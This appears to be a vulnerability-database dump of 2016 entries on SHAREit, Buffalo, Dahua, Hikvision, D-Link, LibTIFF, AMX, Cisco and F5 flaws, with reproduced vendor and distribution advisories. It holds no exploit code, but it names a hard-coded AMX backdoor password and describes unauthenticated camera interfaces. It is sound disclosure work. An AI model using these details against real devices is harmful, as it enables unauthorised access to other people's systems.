2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure in mid-February.
2016-01-14: Core Security informed Lenovo that it is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well.
2016-01-15: Lenovo informed Core Security that they had misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22.
2016-01-15: Core Security informed Lenovo that we committed to a joint security disclosure the day the software releases went live and requested advance notice as soon as they could give it.
2016-01-19: Lenovo informed Core Security that they agreed to our request.
2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday, January 22.
2016-01-20: Core Security requested Lenovo to release the updates on Monday, January 25, as recommended before, in order to give the affected users enough working days to download and install the new version.
2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well.
2016-01-25: Advisory CORE-2016-0002 published.

9. References
[1] http://shareit.lenovo.com/#DOWNLOAD
[2] http://www.lenovo.com

10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201601-0460 CVE-2016-1489 Lenovo SHAREit for Windows and Android information disclosure vulnerability CVSS V2: 4.3
CVSS V3: 8.0
Severity: HIGH
Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors. Supplementary information: the vulnerability type has been classified as CWE-254: Security Features (http://cwe.mitre.org/data/definitions/254.html). A third party may (1) obtain sensitive information by intercepting network traffic, or (2) carry out a man-in-the-middle (MITM) attack. Lenovo SHAREit is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions, gain access to sensitive information, perform man-in-the-middle attacks and bypass the authorization mechanism. Lenovo SHAREit (Eggplant Express) is a file-sharing application from China's Lenovo. This issue is item 7.3 of Core Security advisory CORE-2016-0002 (Lenovo ShareIT Multiple Vulnerabilities, published 2016-01-25, http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities), which is reproduced in full under the preceding entry (the /list file-browsing issue, CVE-2016-1490).
VAR-201601-0717 No CVE Buffalo LinkStation 420 Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Buffalo LinkStation 420 is a NAS (network-attached storage) device from the Japanese vendor Buffalo. A denial-of-service vulnerability exists in the Buffalo LinkStation 420; an attacker could use it to shut down the device and deny service to legitimate users.
VAR-201601-0677 No CVE Dahua camera ONVIF protocol missing authentication CVSS V2: 3.3
CVSS V3: -
Severity: LOW
Zhejiang Dahua Technology Co., Ltd. is a supplier of video surveillance products and solutions, offering video storage, front-end, display-control and intelligent transportation products worldwide. The ONVIF snapshot interface of the Dahua IPC-HF2100 and other Dahua cameras does not require authentication, allowing an attacker to directly retrieve the camera's live video image.
VAR-201601-0676 No CVE Hikvision camera ONVIF protocol missing authentication CVSS V2: 3.3
CVSS V3: -
Severity: LOW
The ONVIF snapshot interface of Hikvision cameras does not require authentication, allowing an attacker to directly retrieve the camera's live video image.
VAR-201601-0680 No CVE Hikvision camera weak management password CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Hikvision cameras have a weak management password that allows logging in with the initial password.
VAR-201601-0681 No CVE D-Link backdoor CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
A backdoor exists in D-Link devices that allows users to log in without a password.
VAR-201601-0682 No CVE FTP signature access CVSS V2: 9.7
CVSS V3: -
Severity: HIGH
An FTP signature-access vulnerability allows unauthorized remote access to system management.
VAR-201604-0195 CVE-2015-8784 LibTIFF tif_next.c NeXTDecode function denial of service (DoS) vulnerability CVSS V2: 4.3
CVSS V3: 6.5
Severity: MEDIUM
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted TIFF image, as demonstrated by libtiff5.tif. LibTIFF is prone to a memory-corruption vulnerability. An attacker could exploit this issue to execute arbitrary code on the affected system; failed exploit attempts may result in denial-of-service conditions.

Ubuntu Security Notice USN-2939-1 (March 23, 2016): tiff vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS.
Summary: LibTIFF could be made to crash or run programs as your login if it opened a specially crafted file.
Update instructions: the problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: libtiff5 4.0.3-12.3ubuntu2.1
Ubuntu 14.04 LTS: libtiff5 4.0.3-7ubuntu0.4
Ubuntu 12.04 LTS: libtiff4 3.9.5-2ubuntu1.9
In general, a standard system update will make all the necessary changes.

Red Hat Security Advisory RHSA-2016:1546-01
Synopsis: Important: libtiff security update
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1546.html
Issue date: 2016-08-02
CVE Names: CVE-2014-8127 CVE-2014-8129 CVE-2014-8130 CVE-2014-9330 CVE-2014-9655 CVE-2015-1547 CVE-2015-7554 CVE-2015-8665 CVE-2015-8668 CVE-2015-8683 CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 CVE-2015-8784 CVE-2016-3632 CVE-2016-3945 CVE-2016-3990 CVE-2016-3991 CVE-2016-5320
1. Summary: An update for libtiff is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64; Red Hat Enterprise Linux Client Optional (v. 7) - x86_64; Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64; Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64; Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64; Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64; Red Hat Enterprise Linux Workstation (v. 7) - x86_64; Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64.
3. Description: The libtiff packages contain a library of functions for manipulating Tagged Image File Format (TIFF) files. Security Fix(es):
* Multiple flaws have been discovered in libtiff. A remote attacker could exploit these flaws to cause a crash or memory corruption and, possibly, execute arbitrary code by tricking an application linked against libtiff into processing specially crafted files. (CVE-2014-9655, CVE-2015-1547, CVE-2015-8784, CVE-2015-8683, CVE-2015-8665, CVE-2015-8781, CVE-2015-8782, CVE-2015-8783, CVE-2016-3990, CVE-2016-5320)
* Multiple flaws have been discovered in various libtiff tools (bmp2tiff, pal2rgb, thumbnail, tiff2bw, tiff2pdf, tiffcrop, tiffdither, tiffsplit, tiff2rgba). By tricking a user into processing a specially crafted file, a remote attacker could exploit these flaws to cause a crash or memory corruption and, possibly, execute arbitrary code with the privileges of the user running the libtiff tool. (CVE-2014-8127, CVE-2014-8129, CVE-2014-8130, CVE-2014-9330, CVE-2015-7554, CVE-2015-8668, CVE-2016-3632, CVE-2016-3945, CVE-2016-3991)
4.
Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 All running applications linked against libtiff must be restarted for this update to take effect. 5. Package List: Red Hat Enterprise Linux Client (v. 7): Source: libtiff-4.0.3-25.el7_2.src.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: libtiff-4.0.3-25.el7_2.src.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Server (v. 
7): Source: libtiff-4.0.3-25.el7_2.src.rpm ppc64: libtiff-4.0.3-25.el7_2.ppc.rpm libtiff-4.0.3-25.el7_2.ppc64.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc64.rpm libtiff-devel-4.0.3-25.el7_2.ppc.rpm libtiff-devel-4.0.3-25.el7_2.ppc64.rpm ppc64le: libtiff-4.0.3-25.el7_2.ppc64le.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc64le.rpm libtiff-devel-4.0.3-25.el7_2.ppc64le.rpm s390x: libtiff-4.0.3-25.el7_2.s390.rpm libtiff-4.0.3-25.el7_2.s390x.rpm libtiff-debuginfo-4.0.3-25.el7_2.s390.rpm libtiff-debuginfo-4.0.3-25.el7_2.s390x.rpm libtiff-devel-4.0.3-25.el7_2.s390.rpm libtiff-devel-4.0.3-25.el7_2.s390x.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: libtiff-debuginfo-4.0.3-25.el7_2.ppc.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc64.rpm libtiff-static-4.0.3-25.el7_2.ppc.rpm libtiff-static-4.0.3-25.el7_2.ppc64.rpm libtiff-tools-4.0.3-25.el7_2.ppc64.rpm ppc64le: libtiff-debuginfo-4.0.3-25.el7_2.ppc64le.rpm libtiff-static-4.0.3-25.el7_2.ppc64le.rpm libtiff-tools-4.0.3-25.el7_2.ppc64le.rpm s390x: libtiff-debuginfo-4.0.3-25.el7_2.s390.rpm libtiff-debuginfo-4.0.3-25.el7_2.s390x.rpm libtiff-static-4.0.3-25.el7_2.s390.rpm libtiff-static-4.0.3-25.el7_2.s390x.rpm libtiff-tools-4.0.3-25.el7_2.s390x.rpm x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 
7): Source: libtiff-4.0.3-25.el7_2.src.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-8127 https://access.redhat.com/security/cve/CVE-2014-8129 https://access.redhat.com/security/cve/CVE-2014-8130 https://access.redhat.com/security/cve/CVE-2014-9330 https://access.redhat.com/security/cve/CVE-2014-9655 https://access.redhat.com/security/cve/CVE-2015-1547 https://access.redhat.com/security/cve/CVE-2015-7554 https://access.redhat.com/security/cve/CVE-2015-8665 https://access.redhat.com/security/cve/CVE-2015-8668 https://access.redhat.com/security/cve/CVE-2015-8683 https://access.redhat.com/security/cve/CVE-2015-8781 https://access.redhat.com/security/cve/CVE-2015-8782 https://access.redhat.com/security/cve/CVE-2015-8783 https://access.redhat.com/security/cve/CVE-2015-8784 https://access.redhat.com/security/cve/CVE-2016-3632 https://access.redhat.com/security/cve/CVE-2016-3945 https://access.redhat.com/security/cve/CVE-2016-3990 https://access.redhat.com/security/cve/CVE-2016-3991 https://access.redhat.com/security/cve/CVE-2016-5320 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2016 Red Hat, Inc. 
Gentoo Linux Security Advisory GLSA 201701-16 https://security.gentoo.org/ Severity: Normal Title: libTIFF: Multiple vulnerabilities Date: January 09, 2017 Bugs: #484542, #534108, #538318, #561880, #572876, #585274, #585508, #599746 ID: 201701-16 Synopsis ======== Multiple vulnerabilities have been found in libTIFF, the worst of which may allow execution of arbitrary code. It is called by numerous programs, including GNOME and KDE applications, to interpret TIFF images. Please review the CVE identifier and bug reports referenced for details. Workaround ========== There is no known workaround at this time. 
Resolution ========== All libTIFF users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/tiff-4.0.7" References ========== [ 1 ] CVE-2013-4243 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4243 [ 2 ] CVE-2014-8127 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8127 [ 3 ] CVE-2014-8128 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8128 [ 4 ] CVE-2014-8129 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8129 [ 5 ] CVE-2014-8130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8130 [ 6 ] CVE-2014-9330 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9330 [ 7 ] CVE-2014-9655 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9655 [ 8 ] CVE-2015-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1547 [ 9 ] CVE-2015-7313 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7313 [ 10 ] CVE-2015-7554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7554 [ 11 ] CVE-2015-8665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8665 [ 12 ] CVE-2015-8668 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8668 [ 13 ] CVE-2015-8683 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8683 [ 14 ] CVE-2015-8781 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8781 [ 15 ] CVE-2015-8782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8782 [ 16 ] CVE-2015-8783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8783 [ 17 ] CVE-2015-8784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8784 [ 18 ] CVE-2016-3186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3186 [ 19 ] CVE-2016-3619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3619 [ 20 ] CVE-2016-3620 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3620 [ 21 ] CVE-2016-3621 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3621 [ 22 ] CVE-2016-3622 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3622 [ 23 ] CVE-2016-3623 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3623 [ 24 ] CVE-2016-3624 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3624 [ 25 ] CVE-2016-3625 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3625 [ 26 ] CVE-2016-3631 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3631 [ 27 ] CVE-2016-3632 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3632 [ 28 ] CVE-2016-3633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3633 [ 29 ] CVE-2016-3634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3634 [ 30 ] CVE-2016-3658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3658 [ 31 ] CVE-2016-3945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3945 [ 32 ] CVE-2016-3990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3990 [ 33 ] CVE-2016-3991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3991 [ 34 ] CVE-2016-5102 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5102 [ 35 ] CVE-2016-5314 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5314 [ 36 ] CVE-2016-5315 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5315 [ 37 ] CVE-2016-5316 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5316 [ 38 ] CVE-2016-5317 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5317 [ 39 ] CVE-2016-5318 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5318 [ 40 ] CVE-2016-5319 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5319 [ 41 ] CVE-2016-5320 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5320 [ 42 ] CVE-2016-5321 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5321 [ 43 ] CVE-2016-5322 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5322 [ 44 ] CVE-2016-5323 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5323 [ 45 ] CVE-2016-5652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5652 [ 46 ] CVE-2016-5875 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5875 [ 47 ] CVE-2016-6223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6223 [ 48 ] CVE-2016-8331 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8331 [ 49 ] CVE-2016-9273 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9273 [ 50 ] CVE-2016-9297 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9297 [ 51 ] CVE-2016-9318 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9318 [ 52 ] CVE-2016-9448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9448 [ 53 ] CVE-2016-9453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9453 [ 54 ] CVE-2016-9532 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9532 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201701-16 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 Multiple out-of-bounds read and write flaws could cause an application using the tiff library to crash. For the oldstable distribution (wheezy), these problems have been fixed in version 4.0.2-6+deb7u5. For the stable distribution (jessie), these problems have been fixed in version 4.0.3-12.3+deb8u1. For the testing distribution (stretch), these problems have been fixed in version 4.0.6-1. For the unstable distribution (sid), these problems have been fixed in version 4.0.6-1. We recommend that you upgrade your tiff packages.
VAR-201601-0399 CVE-2016-1134 Multiple Buffalo network devices vulnerable to cross-site request forgery CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
Cross-site request forgery (CSRF) vulnerability on BUFFALO BHR-4GRV2 devices with firmware 1.04 and earlier, WEX-300 devices with firmware 1.90 and earlier, WHR-1166DHP devices with firmware 1.90 and earlier, WHR-300HP2 devices with firmware 1.90 and earlier, WHR-600D devices with firmware 1.90 and earlier, WMR-300 devices with firmware 1.90 and earlier, WMR-433 devices with firmware 1.01 and earlier, and WSR-1166DHP devices with firmware 1.01 and earlier allows remote attackers to hijack the authentication of arbitrary users. Multiple network devices provided by BUFFALO INC. contain a cross-site request forgery vulnerability (CWE-352). Satoshi Ogawa of Mitsui Bussan Secure Directions, Inc. and Masashi Sakai reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. If a user views a malicious page while logged in, unintended operations may be conducted. Buffalo BHR-4GRV2 and the other listed models are wireless router products of the Buffalo Group of Japan. A remote attacker could exploit this vulnerability to perform unauthorized operations. This may aid in other attacks. Buffalo BHR-4GRV2 etc
VAR-201601-0400 CVE-2016-1135 Multiple Buffalo network devices vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability on BUFFALO BHR-4GRV2 devices with firmware 1.04 and earlier, WEX-300 devices with firmware 1.90 and earlier, WHR-1166DHP devices with firmware 1.90 and earlier, WHR-300HP2 devices with firmware 1.90 and earlier, WHR-600D devices with firmware 1.90 and earlier, WMR-300 devices with firmware 1.90 and earlier, WMR-433 devices with firmware 1.01 and earlier, and WSR-1166DHP devices with firmware 1.01 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Multiple network devices provided by BUFFALO INC. contain a cross-site scripting vulnerability. Satoshi Ogawa of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. An arbitrary script may be executed in the logged-in user's web browser. Buffalo is the wireless router product line of the Buffalo Group. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Buffalo BHR-4GRV2 etc
VAR-201601-0430 CVE-2015-8362 Harman AMX multimedia devices contain hard-coded credentials CVSS V2: 10.0
CVSS V3: 9.8
Severity: HIGH
The setUpSubtleUserAccount function in /bin/bw on Harman AMX devices before 2015-10-12 has a hardcoded password for the BlackWidow account, which makes it easier for remote attackers to obtain access via a (1) SSH or (2) HTTP session, a different vulnerability than CVE-2016-1984. Multiple models of Harman AMX multimedia devices contain a hard-coded debug account. Multiple Harman AMX products have an issue where the account used for debugging is hard-coded. Use of hard-coded credentials (CWE-798) - CVE-2015-8362. According to the discoverer's blog post, multiple models in the AMX series contain a hard-coded account with administrative rights (a "back door"). Check the discoverer's vulnerability advisory for more information. The AMX release notes state that this was a debugging account. CWE-798: Use of Hard-coded Credentials http://cwe.mitre.org/data/definitions/798.html Blog post http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in.html Vulnerability advisory https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20160121-0_AMX_Deliberately_hidden_backdoor_account_v10.txt AMX release notes http://www.amx.com/techcenter/firmware.asp?Category=Hot%20Fix%20Files An attacker who knows the authentication information may gain access to the device with administrator privileges. Harman AMX is a series of conversion controller products from Harman Corporation of the United States. A security vulnerability exists in the 'setUpSubtleUserAccount' function in /bin/bw on Harman AMX devices before 2015-10-12, which stems from a hard-coded password on the BlackWidow account. Multiple AMX products are prone to a security-bypass vulnerability
VAR-201601-0607 CVE-2016-1984 Harman AMX multimedia devices contain hard-coded credentials CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
The setUpSubtleUserAccount function in /bin/bw on Harman AMX devices before 2016-01-20 has a hardcoded password for the 1MB@tMaN account, which makes it easier for remote attackers to obtain access via a (1) SSH or (2) HTTP session, a different vulnerability than CVE-2015-8362. Harman AMX is a series of conversion controller products from Harman Corporation of the United States
VAR-201601-0488 CVE-2015-6412 Cisco Modular Encoding Platform D9036 Software vulnerability allowing access to be obtained CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Cisco Modular Encoding Platform D9036 Software before 02.04.70 has hardcoded (1) root and (2) guest passwords, which makes it easier for remote attackers to obtain access via an SSH session, aka Bug ID CSCut88070. The vendor has confirmed this vulnerability and released it as Bug ID CSCut88070. A third party may gain access through an SSH session. Remote attackers with knowledge of the default credentials may exploit this vulnerability to gain unauthorized access and perform unauthorized actions. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCut88070
VAR-201601-0494 CVE-2015-6435 Cisco FX-OS running on Firepower 9000 devices and Unified Computing System Manager: arbitrary shell command execution vulnerability in an unspecified CGI script CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888. The vendor has confirmed this vulnerability and released it as Bug ID CSCur90888. A third party may execute arbitrary shell commands via a crafted HTTP request. Cisco Unified Computing System Manager and Cisco FX-OS on Firepower 9000 are products of Cisco. The former is a set of embedded device management software that manages the Cisco Unified Computing System end-to-end from a single, highly available logical entity; the latter is an operating system running on the Firepower 9000 Series firewall devices. There are security vulnerabilities in CGI scripts in Cisco UCS Manager and FX-OS for the Firepower 9000 Series. Multiple Cisco products are prone to a remote command-execution vulnerability. This may aid in further attacks. This issue is being tracked by Cisco Bug IDs CSCur90888 and CSCux10615. The following products and versions are affected: Cisco UCS Manager prior to 2.2(4b), 2.2(5) prior to 2.2(5a), 3.0 prior to 3.0(2e), FX-OS for Firepower 9000 Series prior to 1.1.2
VAR-201604-0381 CVE-2015-8021 Multiple F5 BIG-IP products: file upload vulnerability in the Configuration utility CVSS V2: 4.0
CVSS V3: 4.3
Severity: MEDIUM
Incomplete blacklist vulnerability in the Configuration utility in F5 BIG-IP LTM, Analytics, APM, ASM, GTM, Link Controller, and PSM 11.x before 11.2.1 HF11, 11.3.x, 11.4.0 before HF8, and 11.4.1 before HF6; BIG-IP AAM 11.4.0 before HF8 and 11.4.1 before HF6; BIG-IP AFM and PEM 11.3.x, 11.4.0 before HF8, and 11.4.1 before HF6; and BIG-IP Edge Gateway, WebAccelerator, and WOM 11.x before 11.2.1 HF11 and 11.3.0 allows remote authenticated users to upload files via uploadImage.php. The Configuration utility in multiple F5 BIG-IP products contains a vulnerability that allows files to be uploaded because of an incomplete blacklist. Supplementary information: the CWE vulnerability type has been identified as CWE-284: Improper Access Control (http://cwe.mitre.org/data/definitions/284.html). A remotely authenticated user may upload files via uploadImage.php. Multiple F5 BIG-IP products are prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected webserver; this can result in arbitrary code execution within the context of the vulnerable application. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. LTM is a local traffic manager; APM is a solution that provides secure unified access to business-critical applications and networks